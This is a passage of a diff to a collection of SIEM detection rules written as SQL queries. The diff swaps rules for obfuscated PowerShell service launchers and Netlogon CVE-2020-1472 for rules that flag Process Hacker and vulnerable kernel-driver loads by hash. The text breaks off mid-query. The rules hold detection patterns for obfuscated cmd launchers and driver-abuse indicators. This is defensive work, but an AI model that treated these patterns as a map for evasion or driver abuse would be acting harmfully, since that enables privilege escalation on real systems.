"Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System", - "id": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", + "title": "Process Hacker and System Informer Driver Load", + "id": "67add051-9ee7-4ad3-93ba-42935615ae8d", "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects the load of drivers used by Process Hacker and System Informer", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" ], "falsepositives": [ - "Unknown" + "Legitimate user of process hacker or system informer by low level developers or system administrators" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&set%' ESCAPE '\\' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%{0}%' ESCAPE '\\' OR ImagePath LIKE '%{1}%' ESCAPE '\\' OR ImagePath LIKE '%{2}%' ESCAPE '\\' OR ImagePath LIKE '%{3}%' ESCAPE '\\' OR ImagePath LIKE '%{4}%' ESCAPE '\\' OR ImagePath LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\kprocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SystemInformer.sys' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=821D74031D3F625BCBD0DF08B70F1E77%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F86759BB4DE4320918615DC06E998A39%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0A64EEB85419257D0CE32BD5D55C3A18%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6E7B34DFC017700B1517B230DF6FF0D0%' ESCAPE '\\') OR Imphash IN ('821D74031D3F625BCBD0DF08B70F1E77', 'F86759BB4DE4320918615DC06E998A39', '0A64EEB85419257D0CE32BD5D55C3A18', '6E7B34DFC017700B1517B230DF6FF0D0') OR (Hashes LIKE '%SHA256=8B9AD98944AC9886EA4CB07700E71B78BE4A2740934BB7E46CA3B56A7C59AD24%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A41348BEC147CA4D9EA2869817527EB5CEA2E20202AF599D2B30625433BCF454%' ESCAPE '\\' OR Hashes LIKE '%SHA256=38EE0A88AF8535A11EFE8D8DA9C6812AA07067B75A64D99705A742589BDD846D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A773891ACF203A7EB0C0D30942FB1347648F1CD918AE2BFD9A4857B4DCF5081B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4C3B81AC88A987BBDF7D41FA0AECC2CEDF5B9BD2F45E7A21F376D05345FC211D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3241BC14BEC51CE6A691B9A3562E5C1D52E9D057D27A3D67FD0B245C350B6D34%' ESCAPE '\\' OR Hashes LIKE '%SHA256=047C42E9BBA28366868847C7DAFC1E043FB038C796422D37220493517D68EE89%' ESCAPE '\\' OR Hashes LIKE '%SHA256=18931DC81E95D0020466FA091E16869DBE824E543A4C2C8FE644FA71A0F44FEB%' ESCAPE '\\' OR Hashes LIKE '%SHA256=B4C2EF76C204273132FDE38F0DED641C2C5EE767652E64E4C4071A4A973B6C1B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=640954AFC268565F7DAA6E6F81A8EE05311E33E34332B501A3C3FE5B22ADEA97%' ESCAPE '\\' OR Hashes LIKE '%SHA256=251BE949F662C838718F8AA0A5F8211FB90346D02BD63FF91E6B224E0E01B656%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E2606F272F7BA054DF16BE464FDA57211EF0D14A0D959F9C8DCB0575DF1186E4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3A9E1D17BEEB514F1B9B3BACAEE7420285DE5CBDCE89C5319A992C6CBD1DE138%' ESCAPE '\\') OR sha256 IN ('8b9ad98944ac9886ea4cb07700e71b78be4a2740934bb7e46ca3b56a7c59ad24', 'a41348bec147ca4d9ea2869817527eb5cea2e20202af599d2b30625433bcf454', '38ee0a88af8535a11efe8d8da9c6812aa07067b75a64d99705a742589bdd846d', 'a773891acf203a7eb0c0d30942fb1347648f1cd918ae2bfd9a4857b4dcf5081b', '4c3b81ac88a987bbdf7d41fa0aecc2cedf5b9bd2f45e7a21f376d05345fc211d', '3241bc14bec51ce6a691b9a3562e5c1d52e9d057d27a3d67fd0b245c350b6d34', '047c42e9bba28366868847c7dafc1e043fb038c796422d37220493517d68ee89', '18931dc81e95d0020466fa091e16869dbe824e543a4c2c8fe644fa71a0f44feb', 'b4c2ef76c204273132fde38f0ded641c2c5ee767652e64e4c4071a4a973b6c1b', '640954afc268565f7daa6e6f81a8ee05311e33e34332b501a3c3fe5b22adea97', '251be949f662c838718f8aa0a5f8211fb90346d02bd63ff91e6b224e0e01b656', 'e2606f272f7ba054df16be464fda57211ef0d14a0d959f9c8dcb0575df1186e4', '3a9e1d17beeb514f1b9b3bacaee7420285de5cbdce89c5319a992c6cbd1de138'))" ], - "filename": "win_system_invoke_obfuscation_via_var_services.yml" + "filename": "driver_load_win_process_hacker.yml" }, { - "title": "Vulnerable Netlogon Secure Channel Connection Allowed", - "id": "a0cb7110-edf0-47a4-9177-541a4083128a", - "status": "test", - "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", - "author": "NVISO", + "title": "Vulnerable Driver Load", + "id": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", + "status": "experimental", + "description": "Detects the load of known vulnerable drivers by hash value", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1548" + "attack.t1543.003", + "attack.t1068" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'NetLogon' AND EventID = '5829')" + "SELECT * FROM logs WHERE ((Hashes LIKE '%MD5=1b5c3c458e31bede55145d0644e88d75%' ESCAPE '\\' OR Hashes LIKE '%MD5=6f5d54ab483659ac78672440422ae3f1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=c02f70960fa934b8defa16a03d7f6556%' ESCAPE '\\' OR Hashes LIKE '%MD5=839cbbc86453960e9eb6db814b776a40%' ESCAPE '\\' OR Hashes LIKE '%MD5=acac842a46f3501fe407b1db1b247a0b%' ESCAPE '\\' OR Hashes LIKE '%MD5=95e4c7b0384da89dce8ea6f31c3613d9%' ESCAPE '\\' OR Hashes LIKE '%MD5=e700a820f117f65e813b216fccbf78c9%' ESCAPE '\\' OR Hashes LIKE '%MD5=96b463b6fa426ae42c414177af550ba2%' ESCAPE '\\' OR Hashes LIKE '%MD5=27bcbeec8a466178a6057b64bef66512%' ESCAPE '\\' OR Hashes LIKE '%MD5=70dcd07d38017b43f710061f37cb4a91%' ESCAPE '\\' OR Hashes LIKE '%MD5=db72def618cbc3c5f9aa82f091b54250%' ESCAPE '\\' OR Hashes LIKE '%MD5=83601bbe5563d92c1fdb4e960d84dc77%' ESCAPE '\\' OR Hashes LIKE '%MD5=5970e8de1b337ca665114511b9d10806%' ESCAPE '\\' OR Hashes LIKE '%MD5=49fe3d1f3d5c2e50a0df0f6e8436d778%' ESCAPE '\\' OR Hashes LIKE '%MD5=1493d342e7a36553c56b2adea150949e%' ESCAPE '\\' OR Hashes LIKE '%MD5=4f191abc652d8f7442ca2636725e1ed6%' ESCAPE '\\' OR Hashes LIKE '%MD5=0ae30291c6cbfa7be39320badd6e8de0%' ESCAPE '\\' OR Hashes LIKE '%MD5=d104621c93213942b7b43d65b5d8d33e%' ESCAPE '\\' OR Hashes LIKE '%MD5=b89b097b8b8aecb8341d05136f334ebb%' ESCAPE '\\' OR Hashes LIKE '%MD5=14580bd59c55185115fd3abe73b016a2%' ESCAPE '\\' OR Hashes LIKE '%MD5=992ded5b623be3c228f32edb4ca3f2d2%' ESCAPE '\\' OR Hashes LIKE '%MD5=a26e600652c33dd054731b4693bf5b01%' ESCAPE '\\' OR Hashes LIKE '%MD5=1f950cfd5ed8dd9de3de004f5416fe20%' ESCAPE '\\' OR Hashes LIKE '%MD5=491aec2249ad8e2020f9f9b559ab68a8%' ESCAPE '\\' OR Hashes LIKE '%MD5=e4266262a77fffdea2584283f6c4f51d%' ESCAPE '\\' OR Hashes LIKE '%MD5=bd25be845c151370ff177509d95d5add%' ESCAPE '\\' OR Hashes LIKE '%MD5=9638f265b1ddd5da6ecdf5c0619dcbe6%' ESCAPE '\\' OR Hashes LIKE '%MD5=4e90cd77509738d30d3181a4d0880bfa%' ESCAPE '\\' OR Hashes LIKE '%MD5=0a6a1c9a7f80a2a5dcced5c4c0473765%' ESCAPE '\\' OR Hashes LIKE '%MD5=9aa7ed7809eec0d8bc6c545a1d18107a%' ESCAPE '\\' OR Hashes LIKE '%MD5=aa1ed3917928f04d97d8a217fe9b5cb1%' ESCAPE '\\' OR Hashes LIKE '%MD5=42f7cc4be348c3efd98b0f1233cf2d69%' ESCAPE '\\' OR Hashes LIKE '%MD5=4cc3ddd5ae268d9a154a426af2c23ef9%' ESCAPE '\\' OR Hashes LIKE '%MD5=2fed983ec44d1e7cffb0d516407746f2%' ESCAPE '\\' OR Hashes LIKE '%MD5=f7cbbb5eb263ec9a35a1042f52e82ca4%' ESCAPE '\\' OR Hashes LIKE '%MD5=ed6348707f177629739df73b97ba1b6e%' ESCAPE '\\' OR Hashes LIKE '%MD5=40bc58b7615d00eb55ad9ba700c340c1%' ESCAPE '\\' OR Hashes LIKE '%MD5=c3fea895fe95ea7a57d9f4d7abed5e71%' ESCAPE '\\' OR Hashes LIKE '%MD5=2128e6c044ee86f822d952a261af0b48%' ESCAPE '\\' OR Hashes LIKE '%MD5=3dbf69f935ea48571ea6b0f5a2878896%' ESCAPE '\\' OR Hashes LIKE '%MD5=c6f8983dd3d75640c072a8459b8fa55a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=79f7e6f98a5d3ab6601622be4471027f%' ESCAPE '\\' OR Hashes LIKE '%MD5=bae1f127c4ff21d8fe45e2bbfc59c180%' ESCAPE '\\' OR Hashes LIKE '%MD5=c533d6d64b474ffc3169a0e0fc0a701a%' ESCAPE '\\' OR Hashes LIKE '%MD5=3f39f013168428c8e505a7b9e6cba8a2%' ESCAPE '\\' OR Hashes LIKE '%MD5=748cf64b95ca83abc35762ad2c25458f%' ESCAPE '\\' OR Hashes LIKE '%MD5=bce7f34912ff59a3926216b206deb09f%' ESCAPE '\\' OR Hashes LIKE '%MD5=2d8e4f38b36c334d0a32a7324832501d%' ESCAPE '\\' OR Hashes LIKE '%MD5=47e6ac52431ca47da17248d80bf71389%' ESCAPE '\\' OR Hashes LIKE '%MD5=3651a6990fe38711ebb285143f867a43%' ESCAPE '\\' OR Hashes LIKE '%MD5=dc943bf367ae77016ae399df8e71d38a%' ESCAPE '\\' OR Hashes LIKE '%MD5=02198692732722681f246c1b33f7a9d9%' ESCAPE '\\' OR Hashes LIKE '%MD5=ddc2ffe0ab3fcd48db898ab13c38d88d%' ESCAPE '\\' OR Hashes LIKE '%MD5=0ec361f2fba49c73260af351c39ff9cb%' ESCAPE '\\' OR Hashes LIKE '%MD5=c1fce7aac4e9dd7a730997e2979fa1e2%' ESCAPE '\\' OR Hashes LIKE '%MD5=49938383844ceec33dba794fb751c9a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=34069a15ae3aa0e879cd0d81708e4bcc%' ESCAPE '\\' OR Hashes LIKE '%MD5=1c294146fc77565030603878fd0106f9%' ESCAPE '\\' OR Hashes LIKE '%MD5=fd81af62964f5dd5eb4a828543a33dcf%' ESCAPE '\\' OR Hashes LIKE '%MD5=bd5b0514f3b40f139d8079138d01b5f6%' ESCAPE '\\' OR Hashes LIKE '%MD5=fa173832dca1b1faeba095e5c82a1559%' ESCAPE '\\' OR Hashes LIKE '%MD5=5cc5c26fc99175997d84fe95c61ab2c2%' ESCAPE '\\' OR Hashes LIKE '%MD5=1ed043249c21ab201edccb37f1d40af9%' ESCAPE '\\' OR Hashes LIKE '%MD5=361a598d8bb92c13b18abb7cac850b01%' ESCAPE '\\' OR Hashes LIKE '%MD5=9b359b722ac80c4e0a5235264e1e0156%' ESCAPE '\\' OR Hashes LIKE '%MD5=296bde4d0ed32c6069eb90c502187d0d%' ESCAPE '\\' OR Hashes LIKE '%MD5=d3e40644a91327da2b1a7241606fe559%' ESCAPE '\\' OR Hashes LIKE '%MD5=12cecc3c14160f32b21279c1a36b8338%' ESCAPE '\\' OR Hashes LIKE '%MD5=dd39a86852b498b891672ffbcd071c03%' ESCAPE '\\' OR Hashes LIKE '%MD5=b2a9ac0600b12ec9819e049d7a6a0b75%' ESCAPE '\\' OR Hashes LIKE '%MD5=444f538daa9f7b340cfd43974ed43690%' ESCAPE '\\' OR Hashes LIKE '%MD5=7b43dfd84de5e81162ebcfafb764b769%' ESCAPE '\\' OR Hashes LIKE '%MD5=13dda15ef67eb265869fc371c72d6ef0%' ESCAPE '\\' OR Hashes LIKE '%MD5=300c5b1795c9b6cc1bc4d7d55c7bbe85%' ESCAPE '\\' OR Hashes LIKE '%MD5=1392b92179b07b672720763d9b1028a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=2e1f8a2a80221deb93496a861693c565%' ESCAPE '\\' OR Hashes LIKE '%MD5=8065a7659562005127673ac52898675f%' ESCAPE '\\' OR Hashes LIKE '%MD5=b5ada7fd226d20ec6634fc24768f9e22%' ESCAPE '\\' OR Hashes LIKE '%MD5=84fb76ee319073e77fb364bbbbff5461%' ESCAPE '\\' OR Hashes LIKE '%MD5=daf800da15b33bf1a84ee7afc59f0656%' ESCAPE '\\' OR Hashes LIKE '%MD5=f7393fb917aed182e4cbef25ce8af950%' ESCAPE '\\' OR Hashes LIKE '%MD5=120b5bbb9d2eb35ff4f62d79507ea63a%' ESCAPE '\\' OR Hashes LIKE '%MD5=73c98438ac64a68e88b7b0afd11ba140%' ESCAPE '\\' OR Hashes LIKE '%MD5=51207adb8dab983332d6b22c29fe8129%' ESCAPE '\\' OR Hashes LIKE '%MD5=4a23e0f2c6f926a41b28d574cbc6ac30%' ESCAPE '\\' OR Hashes LIKE '%MD5=20125794b807116617d43f02b616e092%' ESCAPE '\\' OR Hashes LIKE '%MD5=e8ebba56ea799e1e62748c59e1a4c586%' ESCAPE '\\' OR Hashes LIKE '%MD5=8abbb12e61045984eda19e2dc77b235e%' ESCAPE '\\' OR Hashes LIKE '%MD5=f66b96aa7ae430b56289409241645099%' ESCAPE '\\' OR Hashes LIKE '%MD5=97e3a44ec4ae58c8cc38eefc613e950e%' ESCAPE '\\' OR Hashes LIKE '%MD5=ff7b31fa6e9ab923bce8af31d1be5bb2%' ESCAPE '\\' OR Hashes LIKE '%MD5=12908c285b9d68ee1f39186110df0f1e%' ESCAPE '\\' OR Hashes LIKE '%MD5=6126065af2fc2639473d12ee3c0c198e%' ESCAPE '\\' OR Hashes LIKE '%MD5=356bda2bf0f6899a2c08b2da3ec69f13%' ESCAPE '\\' OR Hashes LIKE '%MD5=fd7de498a72b2daf89f321d23948c3c4%' ESCAPE '\\' OR Hashes LIKE '%MD5=338a98e1c27bc76f09331fcd7ae413a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=c9a293762319d73c8ee84bcaaf81b7b3%' ESCAPE '\\' OR Hashes LIKE '%MD5=e9e786bdba458b8b4f9e93d034f73d00%' ESCAPE '\\' OR Hashes LIKE '%MD5=a17c58c0582ee560c72f60764ed63224%' ESCAPE '\\' OR Hashes LIKE '%MD5=21e13f2cb269defeae5e1d09887d47bb%' ESCAPE '\\' OR Hashes LIKE '%MD5=a57b47489febc552515778dd0fd1e51c%' ESCAPE '\\' OR Hashes LIKE '%MD5=d6e9f6c67d9b3d790d592557a7d57c3c%' ESCAPE '\\' OR Hashes LIKE '%MD5=76bb1a4332666222a8e3e1339e267179%' ESCAPE '\\' OR Hashes LIKE '%MD5=1cd158a64f3d886357535382a6fdad75%' ESCAPE '\\' OR Hashes LIKE '%MD5=d9e7e5bcc5b01915dbcef7762a7fc329%' ESCAPE '\\' OR Hashes LIKE '%MD5=d253c19194a18030296ae62a10821640%' ESCAPE '\\' OR Hashes LIKE '%MD5=b12d1630fd50b2a21fd91e45d522ba3a%' ESCAPE '\\' OR Hashes LIKE '%MD5=50b39072d0ee9af5ef4824eca34be6e3%' ESCAPE '\\' OR Hashes LIKE '%MD5=778b7feea3c750d44745d3bf294bd4ce%' ESCAPE '\\' OR Hashes LIKE '%MD5=0761c357aed5f591142edaefdf0c89c8%' ESCAPE '\\' OR Hashes LIKE '%MD5=23cf3da010497eb2bf39a5c5a57e437c%' ESCAPE '\\' OR Hashes LIKE '%MD5=c49a1956a6a25ffc25ad97d6762b0989%' ESCAPE '\\' OR Hashes LIKE '%MD5=f406c5536bcf9bacbeb7ce8a3c383bfa%' ESCAPE '\\' OR Hashes LIKE '%MD5=f2f728d2f69765f5dfda913d407783d2%' ESCAPE '\\' OR Hashes LIKE '%MD5=4b817d0e7714b9d43db43ae4a22a161e%' ESCAPE '\\' OR Hashes LIKE '%MD5=715f8efab1d1c660e4188055c4b28eed%' ESCAPE '\\' OR Hashes LIKE '%MD5=a01c412699b6f21645b2885c2bae4454%' ESCAPE '\\' OR Hashes LIKE '%MD5=010c0e5ac584e3ab97a2daf84cf436f5%' ESCAPE '\\' OR Hashes LIKE '%MD5=d5db81974ffda566fa821400419f59be%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014ba35d406475311a2eab0c4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=4d487f77be4471900d6ccbc47242cc25%' ESCAPE '\\' OR Hashes LIKE '%MD5=1f2888e57fdd6aee466962c25ba7d62d%' ESCAPE '\\' OR Hashes LIKE '%MD5=507a649eb585d8d0447eab0532ef0c73%' ESCAPE '\\' OR Hashes LIKE '%MD5=4ad8fd9e83d7200bd7f8d0d4a9abfb11%' ESCAPE '\\' OR Hashes LIKE '%MD5=cd9f0fcecf1664facb3671c0130dc8bb%' ESCAPE '\\' OR Hashes LIKE '%MD5=b10b210c5944965d0dc85e70a0b19a42%' ESCAPE '\\' OR Hashes LIKE '%MD5=ae5eb2759305402821aeddc52ba9a6d6%' ESCAPE '\\' OR Hashes LIKE '%MD5=f5051c756035ef5de9c4c48bacb0612b%' ESCAPE '\\' OR Hashes LIKE '%MD5=1898ceda3247213c084f43637ef163b3%' ESCAPE '\\' OR Hashes LIKE '%MD5=37086ae5244442ba552803984a11d6cb%' ESCAPE '\\' OR Hashes LIKE '%MD5=825703c494e0d270f797f1ecf070f698%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\' OR Hashes LIKE '%MD5=75d6c3469347de1cdfa3b1b9f1544208%' ESCAPE '\\' OR Hashes LIKE '%MD5=9ab9f3b75a2eb87fafb1b7361be9dfb3%' ESCAPE '\\' OR Hashes LIKE '%MD5=5f9785e7535f8f602cb294a54962c9e7%' ESCAPE '\\' OR Hashes LIKE '%MD5=7d46d0ddaf8c7e1776a70c220bf47524%' ESCAPE '\\' OR Hashes LIKE '%MD5=f9844524fb0009e5b784c21c7bad4220%' ESCAPE '\\' OR Hashes LIKE '%MD5=828bb9cb1dd449cd65a29b18ec46055f%' ESCAPE '\\' OR Hashes LIKE '%MD5=4d17b32be70ef39eae5d5edeb5e89877%' ESCAPE '\\' OR Hashes LIKE '%MD5=2391fb461b061d0e5fccb050d4af7941%' ESCAPE '\\' OR Hashes LIKE '%MD5=6d4159694e1754f262e326b52a3b305a%' ESCAPE '\\' OR Hashes LIKE '%MD5=a60c9173563b940203cf4ad38ccf2082%' ESCAPE '\\' OR Hashes LIKE '%MD5=63e333d64a8716e1ae59f914cb686ae8%' ESCAPE '\\' OR Hashes LIKE '%MD5=a9f220b1507a3c9a327a99995ff99c82%' ESCAPE '\\' OR Hashes LIKE '%MD5=c5f5d109f11aadebae94c77b27cb026f%' ESCAPE '\\' OR Hashes LIKE '%MD5=5bab40019419a2713298a5c9173e5d30%' ESCAPE '\\' OR Hashes LIKE '%MD5=c996d7971c49252c582171d9380360f2%' ESCAPE '\\' OR Hashes LIKE '%MD5=98763a3dee3cf03de334f00f95fc071a%' ESCAPE '\\' OR Hashes LIKE '%MD5=e79c91c27df3eaf82fb7bd1280172517%' ESCAPE '\\' OR Hashes LIKE '%MD5=a42249a046182aaaf3a7a7db98bfa69d%' ESCAPE '\\' OR Hashes LIKE '%MD5=803a371a78d528a44ef8777f67443b16%' ESCAPE '\\' OR Hashes LIKE '%MD5=9007c94c9d91ccff8d7f5d4cdddcc403%' ESCAPE '\\' OR Hashes LIKE '%MD5=11fb599312cb1cf43ca5e879ed6fb71e%' ESCAPE '\\' OR Hashes LIKE '%MD5=7f9309f5e4defec132b622fadbcad511%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=8636fe3724f2bcba9399daffd6ef3c7e%' ESCAPE '\\' OR Hashes LIKE '%MD5=9dfd73dadb2f1c7e9c9d2542981aaa63%' ESCAPE '\\' OR Hashes LIKE '%MD5=490b1f404c4f31f4538b36736c990136%' ESCAPE '\\' OR Hashes LIKE '%MD5=c1d063c9422a19944cdaa6714623f2ec%' ESCAPE '\\' OR Hashes LIKE '%MD5=dacb62578b3ea191ea37486d15f4f83c%' ESCAPE '\\' OR Hashes LIKE '%MD5=2da209dde8188076a9579bd256dc90d0%' ESCAPE '\\' OR Hashes LIKE '%MD5=0ba6afe0ea182236f98365bd977adfdf%' ESCAPE '\\' OR Hashes LIKE '%MD5=4c016fd76ed5c05e84ca8cab77993961%' ESCAPE '\\' OR Hashes LIKE '%MD5=ad22a7b010de6f9c6f39c350a471a440%' ESCAPE '\\' OR Hashes LIKE '%MD5=79483cb29a0c428e1362ec8642109eee%' ESCAPE '\\' OR Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%MD5=ccf523b951afaa0147f22e2a7aae4976%' ESCAPE '\\' OR Hashes LIKE '%MD5=736c4b85ce346ddf3b49b1e3abb4e72a%' ESCAPE '\\' OR Hashes LIKE '%MD5=b0baac4d6cbac384a633c71858b35a2e%' ESCAPE '\\' OR Hashes LIKE '%MD5=798de15f187c1f013095bbbeb6fb6197%' ESCAPE '\\' OR Hashes LIKE '%MD5=a86150f2e29b35369afa2cafd7aa9764%' ESCAPE '\\' OR Hashes LIKE '%MD5=b941c8364308990ee4cc6eadf7214e0f%' ESCAPE '\\' OR Hashes LIKE '%MD5=dd04cd3de0c19bede84e9c95a86b3ca8%' ESCAPE '\\' OR Hashes LIKE '%MD5=6909b5e86e00b4033fedfca1775b0e33%' ESCAPE '\\' OR Hashes LIKE '%MD5=9b91a44a488e4d539f2e55476b216024%' ESCAPE '\\' OR Hashes LIKE '%MD5=8b287636041792f640f92e77e560725e%' ESCAPE '\\' OR Hashes LIKE '%MD5=07f83829e7429e60298440cd1e601a6a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0395b4e0eb21693590ad1cfdf7044b8b%' ESCAPE '\\' OR Hashes LIKE '%MD5=4b058945c9f2b8d8ebc485add1101ba5%' ESCAPE '\\' OR Hashes LIKE '%MD5=0067c788e1cb174f008c325ebde56c22%' ESCAPE '\\' OR Hashes LIKE '%MD5=c2c1b8c00b99e913d992a870ed478a24%' ESCAPE '\\' OR Hashes LIKE '%MD5=84ba7af6ada1b3ea5efb9871a0613fc6%' ESCAPE '\\' OR Hashes LIKE '%MD5=dbc415304403be25ac83047c170b0ec2%' ESCAPE '\\' OR Hashes LIKE '%MD5=31469f1313871690e8dc2e8ee4799b22%' ESCAPE '\\' OR Hashes LIKE '%MD5=2d465b4487dc81effaa84f122b71c24f%' ESCAPE '\\' OR Hashes LIKE '%MD5=64efbffaa153b0d53dc1bccda4279299%' ESCAPE '\\' OR Hashes LIKE '%MD5=b164daf106566f444dfb280d743bc2f7%' ESCAPE '\\' OR Hashes LIKE '%MD5=7c72a7e1d42b0790773efd8700e24952%' ESCAPE '\\' OR Hashes LIKE '%MD5=56a515173b211832e20fbc64e5a0447c%' ESCAPE '\\' OR Hashes LIKE '%MD5=c2eb4539a4f6ab6edd01bdc191619975%' ESCAPE '\\' OR Hashes LIKE '%MD5=d1bac75205c389d6d5d6418f0457c29b%' ESCAPE '\\' OR Hashes LIKE '%MD5=68dde686d6999ad2e5d182b20403240b%' ESCAPE '\\' OR Hashes LIKE '%MD5=a785b3bc4309d2eb111911c1b55e793f%' ESCAPE '\\' OR Hashes LIKE '%MD5=6ab7b8ef0c44e7d2d5909fdb58d37fa5%' ESCAPE '\\' OR Hashes LIKE '%MD5=d9ce18960c23f38706ae9c6584d9ac90%' ESCAPE '\\' OR Hashes LIKE '%MD5=ab53d07f18a9697139ddc825b466f696%' ESCAPE '\\' OR Hashes LIKE '%MD5=ba5f0f6347780c2ed911bbf888e75bef%' ESCAPE '\\' OR Hashes LIKE '%MD5=13ee349c15ee5d6cf640b3d0111ffc0e%' ESCAPE '\\' OR Hashes LIKE '%MD5=9a237fa07ce3ed06ea924a9bed4a6b99%' ESCAPE '\\' OR Hashes LIKE '%MD5=fa222bed731713904320723b9c085b11%' ESCAPE '\\' OR Hashes LIKE '%MD5=0898af0888d8f7a9544ef56e5e16354e%' ESCAPE '\\' OR Hashes LIKE '%MD5=e076dadf37dd43a6b36aeed957abee9e%' ESCAPE '\\' OR Hashes LIKE '%MD5=4f27c09cc8680e06b04d6a9c34ca1e08%' ESCAPE '\\' OR Hashes LIKE '%MD5=1b32c54b95121ab1683c7b83b2db4b96%' ESCAPE '\\' OR Hashes LIKE '%MD5=715572dfe6fb10b16f980bfa242f3fa5%' ESCAPE '\\' OR Hashes LIKE '%MD5=4a06bcd96ef0b90a1753a805b4235f28%' ESCAPE '\\' OR Hashes LIKE '%MD5=f242cffd9926c0ccf94af3bf16b6e527%' ESCAPE '\\' OR Hashes LIKE '%MD5=7ed6030f14e66e743241f2c1fa783e69%' ESCAPE '\\' OR Hashes LIKE '%MD5=0d6fef14f8e1ce5753424bd22c46b1ce%' ESCAPE '\\' OR Hashes LIKE '%MD5=a4fda97f452b8f8705695a729f5969f7%' ESCAPE '\\' OR Hashes LIKE '%MD5=62c18d61ed324088f963510bae43b831%' ESCAPE '\\' OR Hashes LIKE '%MD5=d5a642329cce4df94b8dc1ba9660ae34%' ESCAPE '\\' OR Hashes LIKE '%MD5=a641e3dccba765a10718c9cb0da7879e%' ESCAPE '\\' OR Hashes LIKE '%MD5=ed07f1a8038596574184e09211dfc30f%' ESCAPE '\\' OR Hashes LIKE '%MD5=3473faea65fba5d4fbe54c0898a3c044%' ESCAPE '\\' OR Hashes LIKE '%MD5=708ac9f7b12b6ca4553fd8d0c7299296%' ESCAPE '\\' OR Hashes LIKE '%MD5=bbe4f5f8b0c0f32f384a83ae31f49a00%' ESCAPE '\\' OR Hashes LIKE '%MD5=257483d5d8b268d0d679956c7acdf02d%' ESCAPE '\\' OR Hashes LIKE '%MD5=312e31851e0fc2072dbf9a128557d6ef%' ESCAPE '\\' OR Hashes LIKE '%MD5=14eead4d42728e9340ec8399a225c124%' ESCAPE '\\' OR Hashes LIKE '%MD5=de1cc5c266140bff9d964fab87a29421%' ESCAPE '\\' OR Hashes LIKE '%MD5=9a9dbf5107848c254381be67a4c1b1dd%' ESCAPE '\\' OR Hashes LIKE '%MD5=1dc94a6a82697c62a04e461d7a94d0b0%' ESCAPE '\\' OR Hashes LIKE '%MD5=2850608430dd089f24386f3336c84729%' ESCAPE '\\' OR Hashes LIKE '%MD5=6d131a7462e568213b44ef69156f10a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=b8b6686324f7aa77f570bc019ec214e6%' ESCAPE '\\' OR Hashes LIKE '%MD5=22823fed979903f8dfe3b5d28537eb47%' ESCAPE '\\' OR Hashes LIKE '%MD5=c1d3a6bb423739a5e781f7eee04c9cfd%' ESCAPE '\\' OR Hashes LIKE '%MD5=0c0195c48b6b8582fa6f6373032118da%' ESCAPE '\\' OR Hashes LIKE '%MD5=5228b7a738dc90a06ae4f4a7412cb1e9%' ESCAPE '\\' OR Hashes LIKE '%MD5=62f02339fe267dc7438f603bfb5431a1%' ESCAPE '\\' OR Hashes LIKE '%MD5=22949977ce5cd96ba674b403a9c81285%' ESCAPE '\\' OR Hashes LIKE '%MD5=5ca1922ed5ee2b533b5f3dd9be20fd9a%' ESCAPE '\\' OR Hashes LIKE '%MD5=1ed08a6264c5c92099d6d1dae5e8f530%' ESCAPE '\\' OR Hashes LIKE '%MD5=b0770094c3c64250167b55e4db850c04%' ESCAPE '\\' OR Hashes LIKE '%MD5=a6e9d6505f6d2326a8a9214667c61c67%' ESCAPE '\\' OR Hashes LIKE '%MD5=8407ddfab85ae664e507c30314090385%' ESCAPE '\\' OR Hashes LIKE '%MD5=9321a61a25c7961d9f36852ecaa86f55%' ESCAPE '\\' OR Hashes LIKE '%MD5=a711e6ab17802fabf2e69e0cd57c54cd%' ESCAPE '\\' OR Hashes LIKE '%MD5=29ccff428e5eb70ae429c3da8968e1ec%' ESCAPE '\\' OR Hashes LIKE '%MD5=79df0eabbf2895e4e2dae15a4772868c%' ESCAPE 